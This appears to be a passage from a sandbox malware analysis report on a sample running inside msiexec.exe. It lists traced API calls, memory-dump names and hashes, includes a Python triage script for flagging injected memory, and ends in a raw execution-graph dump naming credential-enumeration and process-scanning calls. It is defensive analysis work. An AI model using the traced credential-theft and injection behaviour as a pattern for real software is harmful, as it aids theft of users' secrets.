• Instruction Fuzzy Hash: 83F0E9271412147BD2212719AC85E7FBB7CEFC5B20B40001DFB0883194AB94686282B5
APIs
• _free.LIBCMT ref: 22F591D0
  • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
  • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
• _free.LIBCMT ref: 22F591E2
• _free.LIBCMT ref: 22F591F4
• _free.LIBCMT ref: 22F59206
• _free.LIBCMT ref: 22F59218
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6b84da1e8e7740b4507ff03fa45c09108f8f6320a641c935a154d26947e76b5b
• Instruction ID: 5ed7e393aca8a52789abbac12aeaeed7a289b38a3ab7983aff7a11a9f8e43bda
• Opcode Fuzzy Hash: 6b84da1e8e7740b4507ff03fa45c09108f8f6320a641c935a154d26947e76b5b
• Instruction Fuzzy Hash: F8F0FFB155835CA79A38DA54E6C5C16BBDBEB207147500C05EF29DB504CB34F8A18BA0
APIs
• _free.LIBCMT ref: 22F5536F
  • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
  • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
• _free.LIBCMT ref: 22F55381
• _free.LIBCMT ref: 22F55394
• _free.LIBCMT ref: 22F553A5
• _free.LIBCMT ref: 22F553B6
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fdd1b89fd1df5f9dc66291322baa1265de771207594b28ffe80a8e671108f8ab
• Instruction ID: e4ffab74db0cd27a953b4b6b5d88c3e0c80538031f527f88cfc57559854b2327
• Opcode Fuzzy Hash: fdd1b89fd1df5f9dc66291322baa1265de771207594b28ffe80a8e671108f8ab
• Instruction Fuzzy Hash: 09F05470C95319DF8A2A5F24A580428BBB3F725F243010906FD309B35DD77919229B80
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 22F54C1D
• _free.LIBCMT ref: 22F54CE8
• _free.LIBCMT ref: 22F54CF2
Strings
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\System32\msiexec.exe
• API String ID: 2506810119-1382325751
• Opcode ID: 0b63e32693aa1c23d45edc40f492338e8a86ef1bed1460f2c98172d7643d5312
• Instruction ID: c1e838b1f2302e0086143a2d94fe993f6f8114340eedaa8d429802393d2d5689
• Opcode Fuzzy Hash: 0b63e32693aa1c23d45edc40f492338e8a86ef1bed1460f2c98172d7643d5312
• Instruction Fuzzy Hash: 16319071A40308BFDB15CF99D984D9EBBFEEBD5710F104066EA24AB200D7709A61CB60
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22F56FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22F58731
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22F587BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22F587CC
• __freea.LIBCMT ref: 22F587D5
  • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: f39fb2183669501e6585a58ca5b6573a0117a6b166d4bb0f20efc33be57da289
• Instruction ID: dfd5434362527ee0a43e7207863074a4e5061453623a1fde5c8e566aefede517
• Opcode Fuzzy Hash: f39fb2183669501e6585a58ca5b6573a0117a6b166d4bb0f20efc33be57da289
• Instruction Fuzzy Hash: E631CF72A0130AABDF188F64DC84EAF7BA6EF44714F400268FE05DB190E735D9A5CB90
APIs
• GetModuleHandleA.KERNEL32(22F5C7DD), ref: 22F5C7E6
• GetModuleHandleA.KERNEL32(?,22F5C7DD), ref: 22F5C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 22F5C860
  • Part of subcall function 22F5C803: GetProcAddress.KERNEL32(00000000,22F5C7F4), ref: 22F5C804
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID:
• API String ID: 1646373207-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 5137823d0161e4020dab0061df209b727ed807bffea767772b70d4c14f571c6b
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 66016401A857403CAB1482740C00EBA6FEB9B33767B101B96E343C7093C9AC8636C3F6
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22F51D66,00000000,00000000,?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue), ref: 22F55D13
                                                                                            • GetLastError.KERNEL32(?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue,22F5E190,FlsSetValue,00000000,00000364,?,22F55BC8), ref: 22F55D1F
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue,22F5E190,FlsSetValue,00000000), ref: 22F55D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: b91d477a27b5c115713f1ddd1695881fc806c6529c6545ab3f060676834168bc
                                                                                            • Instruction ID: a14f7034ef88be1cdd1aae92d8359403379074494c239a28db58bcb4e3259902
                                                                                            • Opcode Fuzzy Hash: b91d477a27b5c115713f1ddd1695881fc806c6529c6545ab3f060676834168bc
                                                                                            • Instruction Fuzzy Hash: 5E01F73774A322BBC3114A6C8C4CF46B759AF05AA17110A20FF1BD7148D734D821CAE0
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F5655C
                                                                                              • Part of subcall function 22F562BC: IsProcessorFeaturePresent.KERNEL32(00000017,22F562AB,00000000,?,?,?,?,00000016,?,?,22F562B8,00000000,00000000,00000000,00000000,00000000), ref: 22F562BE
                                                                                              • Part of subcall function 22F562BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22F562E0
                                                                                              • Part of subcall function 22F562BC: TerminateProcess.KERNEL32(00000000), ref: 22F562E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2667617558-3972193922
                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction ID: 8a7c83171311d00ff10a72c6ea3500b8ab8dd1cfd41d91358460290a3c113211
                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction Fuzzy Hash: F951A275E0030AEFDF14CFA8C980AADBBF6EF58314F248169DA64E7305E6359A11CB50
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: : $Se.
                                                                                            • API String ID: 4218353326-4089948878
                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction ID: eaa7ff15e9a3ee816b40bf121e9630b1c982f3f21d35f776385cdb970747809e
                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction Fuzzy Hash: 0A11C1B5900348AEDB14CFAC9840BEEFBFDEF19304F10405AE645E7212E6706A128B65
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 22F52903
                                                                                              • Part of subcall function 22F535D2: RaiseException.KERNEL32(?,?,?,22F52925,00000000,00000000,00000000,?,?,?,?,?,22F52925,?,22F621B8), ref: 22F53632
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 22F52920
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 952c0758de919df255071a1daa7b4a4550d3193d4aa181a1afe2f4a11e2f6235
                                                                                            • Instruction ID: e3eb706f8138cc6cb0002815258923d4188a0a7f0bbbd820e0e44ee9b939a840
                                                                                            • Opcode Fuzzy Hash: 952c0758de919df255071a1daa7b4a4550d3193d4aa181a1afe2f4a11e2f6235
                                                                                            • Instruction Fuzzy Hash: 21F0C839A0430D77AB08ABE5EC94D6D776FAF20750B904371EB24A6190EBB1EA35C5C0
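The Memory Dump Source names above (for example `00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp`) and the snapshot name `hcaresult_6_2_22f50000_msiexec.jbxd` encode where each dumped region came from. The following is an added example, not Joe Sandbox's own code: it splits a dump name into its eight hex fields and decodes fields five to seven as the Win32 `MEMORY_BASIC_INFORMATION` Protect, State and Type constants (`0x40` = PAGE_EXECUTE_READWRITE, `0x1000` = MEM_COMMIT, `0x20000` = MEM_PRIVATE). That field layout, the meaning assigned to the first three fields (process index, run, sequence number) and the triage rule applied are assumptions inferred from the names on this page, not documented report format. The rule flags executable, committed, private memory: such a region is not image-mapped, so a PE found in it (the report's `based on PE: true`) was written into msiexec.exe rather than loaded from disk, which is the footprint of the injection the report describes.

```python
"""Decode Joe Sandbox memory-dump and snapshot names as used in this report.

Added example; not Joe Sandbox's own code. Assumed name layout (inferred from
the instances on this page, not a documented format):
    <proc>.<run>.<seq>.<base>.<protect>.<state>.<type>.<extra>.sdmp
protect/state/type are interpreted as Win32 MEMORY_BASIC_INFORMATION constants.
"""
import re
from typing import Dict, List

# Win32 memory protection / state / type constants (winnt.h).
PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEMTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

_HEX = re.compile(r"[0-9A-Fa-f]+")
# Snapshot names look like hcaresult_<proc>_<run>_<base>_<process>.jbxd (assumed).
_SNAPSHOT = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+)\.jbxd$")


def parse_dump_name(name: str) -> Dict[str, object]:
    """Split a .sdmp file name into its eight hex fields and decode them."""
    stem, _, ext = name.rpartition(".")
    fields = stem.split(".")
    if ext != "sdmp" or len(fields) != 8 or not all(_HEX.fullmatch(f) for f in fields):
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    proc, run, seq, base, protect, state, mtype, extra = (int(f, 16) for f in fields)
    basic = protect & 0xFF  # bits above 0xFF are modifiers such as PAGE_GUARD (0x100)
    return {
        "proc": proc,   # process index within the analysis (assumed meaning)
        "run": run,     # dump round / point in time (assumed meaning)
        "seq": seq,     # dump sequence number (assumed meaning)
        "base": base,   # start address of the dumped region
        "protect": PROTECT.get(basic, f"0x{basic:x}"),
        "guard": bool(protect & 0x100),
        "state": STATE.get(state, f"0x{state:x}"),
        "type": MEMTYPE.get(mtype, f"0x{mtype:x}"),
        "executable": basic in EXECUTABLE,
        "extra": extra,
    }


def is_injected_code_candidate(info: Dict[str, object]) -> bool:
    """Triage rule (assumed heuristic): executable, committed, private memory is not
    backed by an image section, so code there was written into the process rather
    than loaded by the image loader - the classic unpacking / injection footprint."""
    return (bool(info["executable"]) and info["state"] == "MEM_COMMIT"
            and info["type"] == "MEM_PRIVATE")


def parse_snapshot_name(name: str) -> Dict[str, object]:
    """Decode an IDA-plugin snapshot name such as hcaresult_6_2_22f50000_msiexec.jbxd."""
    m = _SNAPSHOT.match(name)
    if not m:
        raise ValueError(f"not a snapshot name: {name!r}")
    return {"proc": int(m.group(1)), "run": int(m.group(2)),
            "base": int(m.group(3), 16), "process": m.group(4)}


def dump_belongs_to_snapshot(dump: Dict[str, object], snap: Dict[str, object]) -> bool:
    """A dump page is attributable to a snapshot when it comes from the same process
    and run and lies at or above the snapshot's module base (the report's Offset)."""
    return (dump["proc"] == snap["proc"] and dump["run"] == snap["run"]
            and dump["base"] >= snap["base"])


def summarize(names: List[str]) -> List[str]:
    """One line per dump, sorted by base address, flagging injected-code candidates."""
    rows = sorted((parse_dump_name(n) for n in names), key=lambda d: d["base"])
    return [f"{d['base']:#010x} {d['protect']:<24} {d['state']:<11} {d['type']:<12}"
            f"{' <- INJECTED-CODE CANDIDATE' if is_injected_code_candidate(d) else ''}"
            for d in rows]


# Names taken from the Memory Dump Source / Snapshot File entries in this report.
REPORT_DUMPS = [
    "00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp",
    "00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp",
    "00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp",
]
REPORT_SNAPSHOT = "hcaresult_6_2_22f50000_msiexec.jbxd"

if __name__ == "__main__":
    snap = parse_snapshot_name(REPORT_SNAPSHOT)
    print(f"snapshot: proc={snap['proc']} run={snap['run']} "
          f"base={snap['base']:#x} process={snap['process']}")
    for line in summarize(REPORT_DUMPS):
        print(line)
```

Run as written, the summary shows the `22F50000` page as PAGE_READWRITE (consistent with a PE header page) and the `22F51000` and `22F66000` pages as PAGE_EXECUTE_READWRITE private memory, which is the combination worth pulling first when triaging a report with "Maps a DLL or memory area into another process" and "Early bird code injection" signatures.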

                                                                                            Execution Graph

                                                                                            Execution Coverage:5.8%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.3%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:74
                                                                                             execution_graph: [rendered call graph spilled into text; the raw node/edge listing (entries of the form `<node> <address> [API names]` and `<from>-><to>`, cut off before its end in this copy) is not reproduced here. Call sites recoverable from the node labels, with the APIs named at each: 4466f4 (CRT startup: __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __wgetmainargs, GetStartupInfoW, GetModuleHandleA, exit, _cexit); 4044a4 (LoadLibraryW, GetProcAddress, FreeLibrary, MessageBoxW); 40a804 (memset, GetSystemDirectoryW, wcscpy, wcscat, LoadLibraryW); 412794 (SetErrorMode, GetModuleHandleW, EnumResourceTypesW); 401134 (GetModuleHandleW, LoadIconW); 409cdb (CreateFontIndirectW); 412863 (CoInitialize); 4123e2 (GetModuleHandleW, RegisterClassW, CreateWindowExW); 412873 and the loop at 4128ca-412957 (ShowWindow, UpdateWindow, LoadAcceleratorsW, GetMessageW, TranslateAcceleratorW, IsDialogMessageW, TranslateMessage, DispatchMessageW, CoUninitialize); 409bca (GetModuleFileNameW); 40d6f5 and 40d65d (memset, GetPrivateProfileStringW, WritePrivateProfileStringW); 40dae1 (GetFileAttributesW, GetPrivateProfileIntW); 40daac (LoadStringW); 40b58d (GetModuleHandleW, FindResourceW, LoadResource, SizeofResource, LockResource); 4018db (GetWindowPlacement, GetSystemMetrics, SetWindowPlacement); 40ea13 (SendMessageW); 414770 (wcscpy, CloseHandle); 40bdb0 (CredEnumerateW at 40bddf, wcsncmp, _wcsnicmp, wcschr, LocalFree at 40bf43); 4135f7 (GetProcAddress, FreeLibrary); 4136c0 (CoTaskMemFree); 444972 and 40a7a0 (GetVersionExW); 40a02c (CreateFileW); 40aebe (FindClose); 40a6e6 (WideCharToMultiByte); 4111a6 (qsort); plus CRT helpers (malloc, free, memcpy, memset, wcslen, wcscpy, wcscat, wcsrchr, _wcsicmp, _wcslwr, _snwprintf, _itow, ??2@YAPAXI, ??3@YAXPAX).]
4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39291 409b98 GetFileAttributesW 38668->39291 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39292 407fdf 75 API calls 38671->39292 39293 409b98 GetFileAttributesW 38672->39293 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39294 4082c7 198 API calls 38676->39294 39295 409b98 GetFileAttributesW 38677->39295 38680 408987 38681 4089a1 38680->38681 38682 40898c 38680->38682 39297 409b98 GetFileAttributesW 38681->39297 39296 408560 29 API calls 38682->39296 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39571 413f27 38700->39571 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39576 413959 38708->39576 39592 413ca4 38708->39592 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 
403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39606 40b1ab free free 38728->39606 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39607 40b1ab free free 38750->39607 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39608 409cea 38759->39608 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39611 414bb0 wcscpy 38764->39611 38765->38763 38767 414cd2 39612 4145ac RegQueryValueExW 38767->39612 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 
4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39613 409b98 GetFileAttributesW 38833->39613 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39614 40bb98 38836->39614 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39648 409a45 GetTempPathW 38842->39648 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39647 40a6e6 WideCharToMultiByte 38846->39647 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 
38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39660 424f26 122 API calls 38863->39660 38864 40b8bd memset 39651 425413 17 API calls 38864->39651 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39661 40a734 MultiByteToWideChar 38880->39661 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39652 4253ef 16 API calls 38885->39652 39653 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39653 39654 4253af 17 API calls 38885->39654 39655 4253cf 17 API calls 38885->39655 39656 447280 memset 38885->39656 39657 447960 memset memcpy memcpy memcpy 38885->39657 39658 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39658 39659 447920 memcpy memcpy memcpy 38885->39659 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39753 409b98 GetFileAttributesW 38898->39753 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39754 409b98 GetFileAttributesW 38906->39754 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 
